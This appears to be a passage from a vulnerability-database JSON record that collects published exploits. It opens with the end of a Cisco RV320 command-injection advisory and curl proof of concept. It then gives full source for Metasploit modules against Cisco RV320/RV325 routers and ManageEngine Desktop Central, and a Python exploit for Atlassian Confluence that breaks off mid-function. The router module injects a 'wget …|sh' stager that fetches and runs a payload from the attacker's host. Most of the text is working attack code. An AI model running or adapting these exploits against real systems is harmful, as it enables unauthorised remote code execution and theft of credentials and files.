by\r\nspecially crafted inputs. By providing the following string for the\r\ncertificate's common name, a \"ping\" command can be injected:\r\n\r\n------------------------------------------------------------------------\r\n'a$(ping -c 4 192.168.1.2)'b\r\n------------------------------------------------------------------------\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe following HTTP POST request invokes the certificate generator\r\nfunction and triggers the command injection. It requires a valid session\r\ncookie for the device's web interface. 
The user agent \"curl\" is\r\nblacklisted by the firmware and must be adjusted in the HTTP client.\r\n\r\n------------------------------------------------------------------------\r\n$ curl -s -k -A kurl -X POST -b \"$COOKIE\" \\\r\n--data \"page=self_generator.htm&totalRules=1&OpenVPNRules=30\"\\\r\n\"&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A\"\\\r\n\"&organization=A&organization_unit=A&email=ab%40example.com\"\\\r\n\"&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&\"\\\r\n\"SelectSubject_s=1\" \\\r\n--data-urlencode \"common_name='a\\$(ping -c 4 192.168.1.2)'b\" \\\r\n\"https://192.168.1.1/certificate_handle2.htm?type=4\"\r\n------------------------------------------------------------------------\r\n\r\nAfterwards, the incoming ICMP echo requests can be observed on the\r\nattacker's system at 192.168.1.2.\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted users from using the router's web interface.\r\n\r\n\r\nFix\r\n===\r\n\r\nNone\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe vulnerability allows attackers with administrative access to the\r\nrouter's web interface to execute arbitrary operating system commands on\r\nthe device. 
Because attackers require valid credentials to the web\r\ninterface, this vulnerability is only rated as a medium risk.\n\n# 0day.today [2019-03-30] #", "sourceHref": "https://0day.today/exploit/32437", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2019-03-30T11:26:16", "description": "", "cvss3": {}, "published": "2019-03-30T00:00:00", "type": "packetstorm", "title": "Cisco RV320 / RV325 Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653", "CVE-2019-1652"], "modified": "2019-03-30T00:00:00", "id": "PACKETSTORM:152305", "href": "https://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Cisco RV320 and RV325 Unauthenticated Remote Code Execution\", \n'Description' => %q{ \nThis exploit module combines an information disclosure (CVE-2019-1653) \nand a command injection vulnerability (CVE-2019-1652) together to gain \nunauthenticated remote code execution on Cisco RV320 and RV325 small business \nrouters. Can be exploited via the WAN interface of the router. Either via HTTPS \non port 443 or HTTP on port 8007 on some older firmware versions. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'RedTeam Pentesting GmbH', # Discovery, Metasploit \n'Philip Huppert', # Discovery \n'Benjamin Grap' # Metasploit \n], \n'References' => [ \n[ 'CVE','2019-1653' ], \n[ 'CVE','2019-1652' ], \n[ 'EDB','46243' ], \n[ 'BID','106728' ], \n[ 'BID','106732' ], \n[ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ], \n[ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ] \n], \n'Platform' => 'linux', \n'Targets' => \n[ \n[ 'LINUX MIPS64', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_MIPS64 \n} \n] \n], \n'Payload' => \n{ \n'BadChars' => \"\" \n}, \n'CmdStagerFlavor' => [ 'bourne' ], \n'Privileged' => true, \n'DisclosureDate' => \"Sep 9 2018\", \n'DefaultTarget' => 0)) \n \nregister_options([ \nOpt::RPORT(8007), # port of Cisco webinterface \nOptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']), \nOptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]), \nOptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up. \n]) \nderegister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option. \nderegister_options('SSLCert') # not required since stager only uses HTTP. 
\nend \n \ndef execute_command(cmd, opts = {}) \n# use generated payload, we don't have to do anything here \nend \n \ndef autofilter \ntrue \nend \n \ndef on_request_uri(cli, req) \nprint_status(\"#{peer} - Payload request received: #{req.uri}\") \n@cmdstager = generate_cmdstager().join(';') \nsend_response(cli, \"#{@cmdstager}\") \nend \n \ndef primer \npayload_url = get_uri \nprint_status(\"Downloading configuration from #{peer}\") \nif(datastore['USE_SSL']) \nprint_status(\"Using SSL connection to router.\") \nend \nres = send_request_cgi({ \n'uri' => normalize_uri(\"cgi-bin\",\"config.exp\"), \n'SSL' => datastore['USE_SSL'] \n}) \nunless res \nvprint_error('Connection failed.') \nreturn nil \nend \n \nunless res.code == 200 \nvprint_error('Could not download config. Aborting.') \nreturn nil \nend \n \nprint_status(\"Successfully downloaded config\") \nusername = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1] \npass = res.body.match(/^PASSWD=(\\h+)/)[1] \nauthkey = \"1964300002\" \nprint_status(\"Got MD5-Hash: #{pass}\") \nprint_status(\"Logging in as user #{username} using password hash.\") \nprint_status(\"Using default auth_key #{authkey}\") \nres2 = send_request_cgi({ \n'uri' => normalize_uri(\"cgi-bin\",\"userLogin.cgi\"), \n'SSL' => datastore['USE_SSL'], \n'method' => 'POST', \n'data' => \"login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password=\" \n}) \n \n# check the login response (res2), not the earlier config download (res) \nunless res2 \nvprint_error('Connection failed during login. Aborting.') \nreturn nil \nend \n \nunless res2.code == 200 \nvprint_error('Login failed with downloaded credentials. Aborting.') \nreturn nil \nend \n \n#Extract authentication cookies \ncookies = res2.get_cookies() \nprint_status(\"Successfully logged in as user #{username}.\") \nprint_status(\"Got cookies: #{cookies}\") \nprint_status(\"Sending payload. 
Staging via #{payload_url}.\") \n#Build staging command \ncommand_string = CGI::escape(\"'$(wget -q -O- #{payload_url}|sh)'\") \nif(command_string.length <= 63) \nprint_status(\"Staging command length looks good. Sending exploit!\") \nelse \nvprint_error(\"Warning: Staging command length probably too long. Trying anyway...\") \nend \n \nres3 = send_request_cgi({ \n'uri' => normalize_uri(\"certificate_handle2.htm\"), \n'SSL' => datastore['USE_SSL'], \n'method' => 'POST', \n'cookie' => cookies, \n'vars_get' => { \n'type' => '4', \n}, \n'vars_post' => { \n'page' => 'self_generator.htm', \n'totalRules' => '1', \n'OpenVPNRules' => '30', \n'submitStatus' => '1', \n'log_ch' => '1', \n'type' => '4', \n'Country' => 'A', \n'state' => 'A', \n'locality' => 'A', \n'organization' => 'A', \n'organization_unit' => 'A', \n'email' => 'any@example.com', \n'KeySize' => '512', \n'KeyLength' => '1024', \n'valid_days' => '30', \n'SelectSubject_c' => '1', \n'SelectSubject_s' => '1' \n}, \n'data' => \"common_name=#{command_string}\" \n}) \nunless res3 \nvprint_error('Connection failed while sending command. Aborting.') \nreturn nil \nend \n \nunless res3.code == 200 \nvprint_error('Sending command not successful.') \nreturn nil \nend \nprint_status(\"Sending payload timed out. Waiting for stager to connect...\") \nend \n \ndef check \n#Check if device is vulnerable by downloading the config \nres = send_request_cgi({'uri'=>normalize_uri(\"cgi-bin\",\"config.exp\")}) \n \nunless res \nvprint_error('Connection failed.') \nreturn CheckCode::Unknown \nend \n \nunless res.code == 200 \nreturn CheckCode::Safe \nend \n \nunless res.body =~ /PASSWD/ \nreturn CheckCode::Detected \nend \n \nCheckCode::Vulnerable \nend \n \ndef exploit \n# Main function. \n# Setting delay for the Stager. \nTimeout.timeout(datastore['HTTPDELAY']) {super} \nrescue Timeout::Error \nprint_status(\"Waiting for stager connection timed out. 
Try increasing the delay.\") \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152305/cisco_rv32x_rce.rb.txt", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-14T22:50:18", "description": "", "cvss3": {}, "published": "2020-03-14T00:00:00", "type": "packetstorm", "title": "ManageEngine Desktop Central Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-14T00:00:00", "id": "PACKETSTORM:156730", "href": "https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine Desktop Central Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in the \ngetChartImage() method from the FileStorage class within ManageEngine \nDesktop Central versions < 10.0.474. Tested against 10.0.465 x64. \n \n\"The short-term fix for the arbitrary file upload vulnerability was \nreleased in build 10.0.474 on January 20, 2020. 
In continuation of that, \nthe complete fix for the remote code execution vulnerability is now \navailable in build 10.0.479.\" \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-10189'], \n['URL', 'https://srcincite.io/advisories/src-2020-0011/'], \n['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], \n['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], \n['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] \n], \n'DisclosureDate' => '2020-03-05', # 0day release \n'License' => MSF_LICENSE, \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n], \n['Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper \n], \n['PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'RPORT' => 8383, \n'SSL' => true, \n'WfsDelay' => 60 # It can take a little while to trigger \n}, \n'CmdStagerFlavor' => 'certutil', # This works without issue \n'Notes' => { \n'PatchedVersion' => Gem::Version.new('100474'), \n'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? 
\n'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'configurations.do') \n) \n \nunless res \nreturn CheckCode::Unknown('Target is not responding to check') \nend \n \nunless res.code == 200 && res.body.include?('ManageEngine Desktop Central') \nreturn CheckCode::Unknown('Target is not running Desktop Central') \nend \n \nversion = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text \n \nunless version \nreturn CheckCode::Detected('Could not detect Desktop Central version') \nend \n \nvprint_status(\"Detected Desktop Central version #{version}\") \n \nif Gem::Version.new(version) < notes['PatchedVersion'] \nreturn CheckCode::Appears(\"#{version} is an exploitable version\") \nend \n \nCheckCode::Safe(\"#{version} is not an exploitable version\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# XXX: An executable is required to run arbitrary commands \ncmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper \n \nvprint_status(\"Serializing command: #{cmd}\") \n \n# I identified mr_me's binary blob as the CommonsBeanutils1 payload :) \nserialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( \n'CommonsBeanutils1', \ncmd \n) \n \n# XXX: Patch in expected serialVersionUID \nserialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\" \n \n# 
Rock 'n' roll! \nupload_serialized_payload(serialized_payload) \ndeserialize_payload \nend \n \ndef upload_serialized_payload(serialized_payload) \nprint_status('Uploading serialized payload') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/mdm/client/v1/mdmLogUploader'), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart', \n'filename' => 'logger.zip' \n}, \n'data' => serialized_payload \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') \nend \n \nprint_good('Successfully uploaded serialized payload') \n \n# C:\\Program Files\\DesktopCentral_Server\\bin \nregister_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip') \nend \n \ndef deserialize_payload \nprint_status('Deserializing payload') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'cewolf/'), \n'vars_get' => {'img' => '\\\\logger.zip'} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not deserialize payload') \nend \n \nprint_good('Successfully deserialized payload') \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156730/desktopcentral_deserialization.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T15:47:25", "description": "", "cvss3": {}, "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence 6.12.1 Template Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161065", "href": "https://packetstormsecurity.com/files/161065/Atlassian-Confluence-6.12.1-Template-Injection.html", "sourceData": "`# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \n# Date: 21-Jan-2021 \n# Exploit Author: 46o60 \n# 
Vendor Homepage: https://www.atlassian.com/software/confluence \n# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n# Version: 6.12.1 \n# Tested on: Ubuntu 20.04.1 LTS \n# CVE : CVE-2019-3396 \n \n#!/usr/bin/env python3 \n# -*- coding: UTF-8 -*- \n\"\"\" \n \nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/): server-side template injection in the \nWidget Connector macro of Atlassian Confluence Server. \n \nVulnerability information: \nAuthors: \nDaniil Dmitriev - Discovering vulnerability \nDmitry (rrock) Shchannikov - Metasploit module \nExploit \nExploitDB: \nhttps://www.exploit-db.com/exploits/46731 \nMetasploit \nhttps://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/ \nexploit/multi/http/confluence_widget_connector \n \nWhile the Metasploit module works perfectly fine, it has a limitation: to gain RCE, an outbound FTP request is made \nfrom the target Confluence server towards the attacker's server, where the Velocity template with the payload is \nhosted. If this is not possible, for example because the network where the target Confluence server is located filters \nall outbound traffic, an alternative approach is needed. This exploit, in addition to the original exploit, implements \nthat alternative approach by first uploading the template to the server and then loading it from the local file system \nwith the original vulnerability. The limitation is that to upload a file, a valid session is needed for a non-privileged \nuser. Any user can upload a file to the server by attaching the file to their \"personal space\". \n \nThere are two modes of the exploit: \n1. Exploiting path traversal for file disclosure and directory listings. \n2. RCE by uploading a template file with payload to the server. 
\n \nIn cases where the network is filtered, so loading a remote template is not possible, and you also do not have a \nlow-privileged user session, you can still exploit the '_template' parameter to browse the server file system by using \nthe first mode of this exploit. Conveniently, the application returns file content as well as directory listings, \ndepending on what the path points to. As in the original exploit, no authentication is needed for this mode. \n \nLimitations of the path traversal exploit: \n- not possible to distinguish between a non-existent path and lack of permissions \n- no distinction between files and directories in the output \n \nIf you are able to authenticate to the server and have enough privileges to upload files, use the second mode. A \nregular user probably has enough privileges for this, since each user can have their own personal space to which they \nshould be able to add attachments. This exploit automatically finds the personal space (or creates one if it does not \nexist) and uploads a file containing the Velocity template payload to it. It then uses the original vulnerability, but \nloads the template file with the payload from the local filesystem instead of from a remote system. 
\n \nPrerequisites for RCE with this exploit: \n- an authenticated session is needed \n- knowledge of where attached files are stored on the file system - if it is not the default location, use the first \nmode to find it; it should be in the Confluence home directory under the ./attachments subdirectory \n \nUsage \n- list the /etc folder on the Confluence server hosted on http://confluence.example.com \npython exploit.py -th confluence.example.com fs /etc \n- get the content of /etc/passwd on the same server, but through a proxy \npython exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd \n- execute the 'whoami' command on the same server (this will upload a template file with the payload to the server \nusing the existing session) \npython exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\" \n \nTested on Confluence versions: \n6.12.1 \n \nTo test the exploit: \n1. Download the Confluence trial version 6.12.1 \nhttps://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n(to find this URL go to the download page for the latest version, pick the LTS release for Linux 64 Bit, turn on the \nbrowser network tools to capture HTTP traffic, click Submit, take the URL from the request towards 'product-downloads' \nand change the version in the URL to 6.12.1) \nSHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin \n2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and leave everything at the defaults. \nchmod +x atlassian-confluence-6.12.1-x64.bin \nsudo ./atlassian-confluence-6.12.1-x64.bin \n3. Open the browser to configure the initial installation; when you get to the license window, copy the server ID. \n4. Create an account at https://my.atlassian.com/ and request a new trial license using the server ID. \n5. Activate the license and finish the installation with the default options. \n6. 
Create a user and log in as that user to go through the initial user setup and get the session ID for the RCE part of the \nexploit. \n7. Run the exploit (see usage above). \n\"\"\" \n \n__version__ = \"1.0.0\" \n__author__ = \"46o60\" \n \nimport argparse \nimport logging \nimport requests \nimport urllib3 \nfrom bs4 import BeautifulSoup \nimport re \nimport json \nimport random \nimport string \n \n# script and banner \nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\" \nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \n \n\"\"\" \n \n# turn off requests log output \nurllib3.disable_warnings() \nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING) \n \n \ndef print_banner(): \n\"\"\" \nPrints script ASCII banner and basic information. \n \nBecause it is cool. \n\"\"\" \nprint(ASCII_BANNER_TEXT) \nprint(\"{} v{}\".format(SCRIPT_NAME, __version__)) \nprint(\"Author: {}\".format(__author__)) \nprint() \n \n \ndef exit_log(logger, message): \n\"\"\" \nUtility function to log exit message and finish the script. \n\"\"\" \nlogger.error(message) \nexit(1) \n \n \ndef check_cookie_format(value): \n\"\"\" \nChecks if value is in format: ^[^=]+=[^=]+$ \n\"\"\" \npattern = r\"^[^=]+=[^=]+$\" \nif not re.match(pattern, value): \nraise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\") \nreturn value \n \n \ndef parse_arguments(): \n\"\"\" \nPerforms parsing of script arguments. 
\n\"\"\" \n# creating parser \nparser = argparse.ArgumentParser( \nprog=SCRIPT_NAME, \ndescription=\"Exploit CVE-2019-3396 to explore file system or gain RCE through file upload.\" \n) \n \n# general script arguments \nparser.add_argument( \n\"-V\", \"--version\", \nhelp=\"displays the current version of the script\", \naction=\"version\", \nversion=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__) \n) \nparser.add_argument( \n\"-v\", \"--verbosity\", \nhelp=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\", \naction=\"count\", \ndefault=0 \n) \nparser.add_argument( \n\"-sb\", \"--skip-banner\", \nhelp=\"skips printing of the banner\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-s\", \"--silent\", \nhelp=\"do not output results of the exploit to standard output\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-q\", \"--quiet\", \nhelp=\"do not output any logs\", \naction=\"store_true\", \ndefault=False \n) \n \n# arguments for input \nparser.add_argument( \n\"-px\", \"--proxy\", \nhelp=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\" \n) \nparser.add_argument( \n\"-t\", \"--tls\", \nhelp=\"use HTTPS protocol, default behaviour is to use plain HTTP\", \naction=\"store_true\" \n) \nparser.add_argument( \n\"-th\", \"--target-host\", \nhelp=\"target hostname/domain\", \nrequired=True \n) \nparser.add_argument( \n\"-p\", \"--port\", \nhelp=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\" \n) \n \n# two different sub commands \nsubparsers = parser.add_subparsers( \ntitle=\"actions\", \ndescription=\"different behaviours of the script\", \nhelp=\"for detail description of available action options invoke -h for each individual action\", \ndest=\"action\" \n) \n \n# only exploring file system by disclosure of files and directories \nparser_file_system = 
subparsers.add_parser( \n\"fs\", \nhelp=\"use the exploit to browse the local file system on the target endpoint\" \n) \nparser_file_system.add_argument( \n\"path\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_file_system.set_defaults(func=exploit_path_traversal) \n \n# using file upload to deploy payload and achieve RCE \nparser_rce = subparsers.add_parser( \n\"rce\", \nhelp=\"use the exploit to upload a template with a payload and execute a command on the target\" \n) \nparser_rce.add_argument( \n\"-hd\", \"--home-directory\", \nhelp=\"Confluence home directory on the server\" \n) \nparser_rce.add_argument( \n\"-c\", \"--cookie\", \nhelp=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \" \n\"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\", \ntype=check_cookie_format, \nrequired=True \n) \nparser_rce.add_argument( \n\"command\", \nhelp=\"command that should be executed on the vulnerable server, quote it if it contains spaces\" \n) \nparser_rce.set_defaults(func=exploit_rce) \n \n# parsing \narguments = parser.parse_args() \n \nreturn arguments \n \n \nclass Configuration: \n\"\"\" \nRepresents all supported configuration items. \n\"\"\" \n \n# Parse arguments and set all configuration variables \ndef __init__(self, script_args): \nself.script_arguments = script_args \n \n# setting input arguments \nself._proxy = self.script_arguments.proxy \nself._target_protocol = \"https\" if self.script_arguments.tls else \"http\" \nself._target_host = self.script_arguments.target_host \nself._target_port = self.script_arguments.port if self.script_arguments.port else \\ \n443 if self.script_arguments.tls else 80 \n \n@staticmethod \ndef get_logger(verbosity): \n\"\"\" \nPrepares logger to output to stdout with appropriate verbosity. 
\n\"\"\" \nlogger = logging.getLogger() \n# default logging level \nlogger.setLevel(logging.DEBUG) \n \n# Definition of logging to console \nch = logging.StreamHandler() \n# specific logging level for console \nif verbosity == 0: \nch.setLevel(logging.INFO) \nelif verbosity > 0: \nch.setLevel(logging.DEBUG) \n \n# formatting \nclass MyFormatter(logging.Formatter): \n \ndefault_fmt = logging.Formatter('[?] %(message)s') \ninfo_fmt = logging.Formatter('[+] %(message)s') \nerror_fmt = logging.Formatter('[-] %(message)s') \nwarning_fmt = logging.Formatter('[!] %(message)s') \ndebug_fmt = logging.Formatter('>>> %(message)s') \n \ndef format(self, record): \nif record.levelno == logging.INFO: \nreturn self.info_fmt.format(record) \nelif record.levelno == logging.ERROR: \nreturn self.error_fmt.format(record) \nelif record.levelno == logging.WARNING: \nreturn self.warning_fmt.format(record) \nelif record.levelno == logging.DEBUG: \nreturn self.debug_fmt.format(record) \nelse: \nreturn self.default_fmt.format(record) \n \nch.setFormatter(MyFormatter()) \n \n# adding handler \nlogger.addHandler(ch) \n \nreturn logger \n \n# Properties \n@property \ndef endpoint(self): \nif not self._target_protocol or not self._target_host or not self._target_port: \nexit_log(log, \"failed to generate endpoint URL\") \nreturn f\"{self._target_protocol}://{self._target_host}:{self._target_port}\" \n \n@property \ndef remote_path(self): \nreturn self.script_arguments.path \n \n@property \ndef attachment_dir(self): \nhome_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \\ \nExploit.DEFAULT_CONFLUENCE_INSTALL_DIR \nreturn f\"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}\" \n \n@property \ndef rce_command(self): \nreturn self.script_arguments.command \n \n@property \ndef session_cookie(self): \nif not self.script_arguments.cookie: \nreturn None \nparts = self.script_arguments.cookie.split(\"=\") \nreturn { \nparts[0]: parts[1] \n} \n \n@property 
\ndef proxies(self): \nreturn { \n\"http\": self._proxy, \n\"https\": self._proxy \n} \n \n \nclass Exploit: \n\"\"\" \nThis class represents actual exploit towards the target Confluence server. \n\"\"\" \n# used for both path traversal and RCE \nDEFAULT_VULNERABLE_ENDPOINT = \"/rest/tinymce/1/macro/preview\" \n \n# used only for RCE \nCREATE_PERSONAL_SPACE_PATH = \"/rest/create-dialog/1.0/space-blueprint/create-personal-space\" \nPERSONAL_SPACE_KEY_PATH = \"/index.action\" \nPERSONAL_SPACE_KEY_REGEX = r\"^/spaces/viewspace\\.action\\?key=(.*?)$\" \nPERSONAL_SPACE_ID_PATH = \"/rest/api/space\" \nPERSONAL_SPACE_KEY_PARAMETER_NAME = \"spaceKey\" \nHOMEPAGE_REGEX = r\"/rest/api/content/([0-9]+)$\" \nATL_TOKEN_PATH = \"/pages/viewpageattachments.action\" \nFILE_UPLOAD_PATH = \"/pages/doattachfile.action\" \n# file name has no real significance, file is identified on file system by its ID \n# (change only if you want to avoid detection) \nDEFAULT_UPLOADED_FILE_NAME = \"payload_{}.vm\".format( \n''.join(random.choice(string.ascii_lowercase) for i in range(5)) \n) # the extension .vm is not really needed, remove it if you have problems uploading the template \nDEFAULT_CONFLUENCE_INSTALL_DIR = \"/var/atlassian/application-data/confluence\" \nDEFAULT_CONFLUENCE_ATTACHMENT_PATH = \"/attachments/ver003\" \n# using random name for uploaded file so it will always be first version of the file \nDEFAULT_FILE_VERSION = \"1\" \n \ndef __init__(self, config): \n\"\"\" \nRuns the exploit towards target_url. 
\n\"\"\" \nself._config = config \n \nself._target_url = f\"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}\" \n \nif self._config.script_arguments.action == \"rce\": \nself._root_url = f\"{self._config.endpoint}/\" \nself._create_personal_space_url = f\"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}\" \nself._personal_space_key_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}\" \n \n# Following data will be dynamically created while exploit is running \nself._space_key = None \nself._personal_space_id_url = None \nself._space_id = None \nself._homepage_id = None \nself._atl_token_url = None \nself._atl_token = None \nself._upload_url = None \nself._file_id = None \n \ndef generate_payload_location(self): \n\"\"\" \nGenerates location on file system for uploaded attachment based on Confluence Ver003 scheme. \n \nSee more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html \n\"\"\" \nif not self._space_id or not self._homepage_id or not self._file_id: \nexit_log(log, \"cannot generate payload location without space, homepage and file ID\") \n \nspace_folder_one = str(int(self._space_id[-3:]) % 250) \nspace_folder_two = str(int(self._space_id[-6:-3]) % 250) \nspace_folder_three = self._space_id \npage_folder_one = str(int(self._homepage_id[-3:]) % 250) \npage_folder_two = str(int(self._homepage_id[-6:-3]) % 250) \npage_folder_three = self._homepage_id \nfile_folder = self._file_id \nversion = Exploit.DEFAULT_FILE_VERSION \n \npayload_location = f\"{self._config.attachment_dir}/\" \\ \nf\"{space_folder_one}/{space_folder_two}/{space_folder_three}/\"\\ \nf\"{page_folder_one}/{page_folder_two}/{page_folder_three}/\" \\ \nf\"{file_folder}/{version}\" \nlog.debug(f\"generated payload location: {payload_location}\") \n \nreturn payload_location \n \ndef path_traversal(self, target_remote_path, decode_output=False): \n\"\"\" \nUses vulnerability in _template parameter to achieve 
